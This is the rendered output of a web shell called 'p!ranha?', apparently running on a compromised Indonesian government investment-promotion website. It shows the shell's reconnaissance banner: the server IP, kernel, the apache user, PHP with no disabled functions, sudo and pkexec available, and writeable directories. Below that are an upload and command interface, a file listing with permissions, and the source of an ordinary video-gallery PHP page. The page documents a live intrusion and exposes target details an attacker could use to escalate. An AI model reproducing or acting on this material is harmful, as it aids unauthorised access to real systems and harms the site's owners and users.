p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.108
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/dpmptsp/public_html/promosi/page/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /home/dpmptsp/public_html/promosi/page/video.php
	<style>
	.slider_font {
		font-family: 'Euphoria Script', cursive;
		font-family: 'Satisfy', cursive;
		color: #c6e2ff;
			text-shadow:
		0 0 2px rgba(202,228,225,0.92),
		0 0 10px rgba(202,228,225,0.34),
		0 0 4px rgba(30,132,242,0.52),
		0 0 7px rgba(30,132,242,0.92),
		0 0 11px rgba(30,132,242,0.78),
		0 0 16px rgba(30,132,242,0.92);
		
	}
	
	.portfolio__content {
	  background: rgb(0, 0, 0);
	  background: rgba(0, 0, 0, 0.5); 
	}
		
	</style> 
 <!-- ========================
       page title 
    =========================== -->
    <section class="page-title page-title-layout7 bg-overlay bg-overlay-2 bg-parallax text-center" style="background:url(<?php echo PATH2;?>promosi/assets/images/gallery_video_Recovered.jpg);background-size:cover;">
      <div class="container">
        <div class="row align-items-center">
          <div class="col-sm-12 col-md-12 col-lg-12">
           <h1 class="pagetitle__heading mb-0 slider_font" style="font-size:64px;color:#FFFFFF;">&nbsp;</h1>
          </div><!-- /.col-xl-6 -->
        </div><!-- /.row -->
      </div><!-- /.container -->
    </section><!-- /.page-title -->

    <!-- =========================== 
      portfolio standard 
    ============================= -->
    <section class="portfolio-carousel">
      <div class="container">
        <div class="row align-items-center mb-20">
          <div class="col-sm-12 col-md-12 col-lg-5">
          
          </div><!-- /.col-lg-6 -->
          <div class="col-sm-12 col-md-12 col-lg-7">
            <nav id="slick-filter-buttons" class="nav nav-tabs justify-content-end">
              <a href="#" class="nav__link active" data-value="all">Semua</a>
              <a href="#" class="nav__link" data-value="UMKM">UMKM</a>
              <a href="#" class="nav__link" data-value="UB">Usaha Besar</a>
              <a href="#" class="nav__link" data-value="Event">Event</a>
            </nav>
          </div><!-- /.col-lg-6 -->
        </div><!-- /.row -->
        <div class="row">
          <div class="col-10 text-center">
            <div class="slick-carousel" id="filter-carousel"
              data-slick='{"slidesToShow":2, "arrows": true, "dots": true, "responsive": [ { "settings": {"slidesToShow": 2}}, { "settings": {"slidesToShow": 2}}]}'>
			<?php
$video = array(
	array('src' => 'HY5qUsZjtlk', 'tipe'=>'UMKM all'),
	array('src' => 'e6Dq7BbWsmA', 'tipe'=>'UMKM all'),
	array('src' => 'dtXLcaJAw-g', 'tipe'=>'UMKM all'),
	array('src' => '0MqOBk5zFew', 'tipe'=>'UMKM all'),
	array('src' => 'NbXc0JJDNjI', 'tipe'=>'UMKM all'),
	array('src' => 'axhGLhtJu4o', 'tipe'=>'UMKM all'),
	
	array('src' => '2RtbofLKW3I', 'tipe'=>'UB all'),
	array('src' => 'MsPVaxfzhAc', 'tipe'=>'UB all'),
	array('src' => '_Ntc4pUJVhk', 'tipe'=>'UB all'),
	array('src' => '7SjdEQ32Uz0', 'tipe'=>'UB all'),
	array('src' => 'O1_h6kLcwFg', 'tipe'=>'UB all'),
	array('src' => 'KAmmGTvaWIY', 'tipe'=>'UB all'),
	
	
	array('src' => 'o8Y_f0Dj1tQ', 'tipe'=>'UMKM all'),
	array('src' => 'JIPF8e0GWBg', 'tipe'=>'UMKM all'),
	array('src' => 'ey0I38wJR2U', 'tipe'=>'UMKM all'),
	array('src' => '_Xn2XR5VKBs', 'tipe'=>'UB all'),
	array('src' => 'D534B3wKv-w', 'tipe'=>'UB all'),
	array('src' => 'JCzlTHhRMWc', 'tipe'=>'UB all'),
	array('src' => 'yCOsSDLbl9s', 'tipe'=>'UB all'),
	array('src' => '9mgctQAyalo', 'tipe'=>'UB all'),
	array('src' => 'DI3rPqfoJvI', 'tipe'=>'UB all'),
	array('src' => 'o2J--E8zu3Y', 'tipe'=>'Event all'),
	array('src' => 'sCdg_4Ol0qI', 'tipe'=>'Event all'),
	array('src' => 'AplwkPJqXR0', 'tipe'=>'Event all'),
	array('src' => 'J5Rrg3yh2gY', 'tipe'=>'Event all'),
	array('src' => 'OepMPVPrXqM', 'tipe'=>'Event all'),

);	

			foreach($video as $v){
			?>
			<!-- portfolio item #1 -->
              <div class="portfolio-item <?php echo $v['tipe']; ?>">
                <div class="portfolio__img text-center">
                 <iframe class="hover_effect" src="https://www.youtube.com/embed/<?php echo $v['src']; ?>" frameborder="0" width="500" height="250" allowfullscreen></iframe>
                </div><!-- /.portfolio-img -->
              </div><!-- /.portfolio-item -->
			<?php
			}
			?>			  
            </div><!-- /.carousel -->
          </div><!-- /.col-lg-12 -->
        </div><!-- /.row -->
      </div><!-- /.container -->
    </section><!-- /.portfolio standard -->
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
December 21 2023 09:41:40
1000 / 1000
0755
PMA.php
4.212 KB
January 13 2024 08:42:42
1000 / 1000
0755
PMDN.php
4.215 KB
August 21 2024 05:53:36
1000 / 1000
0755
UMKM.php
3.862 KB
August 21 2024 05:53:49
1000 / 1000
0755
contactmedsos.html
3.094 KB
January 13 2024 08:42:42
1000 / 1000
0755
foto.php
5.791 KB
January 13 2024 08:42:42
1000 / 1000
0755
home.php
29.549 KB
June 20 2025 03:55:19
1000 / 1000
0755
investasi.php
3.001 KB
August 21 2024 05:54:41
1000 / 1000
0755
probiz.php
3.941 KB
August 21 2024 05:54:33
1000 / 1000
0755
proses.php
6.152 KB
January 13 2024 08:42:42
1000 / 1000
0755
video.php
4.3 KB
February 10 2025 03:28:59
1000 / 1000
0755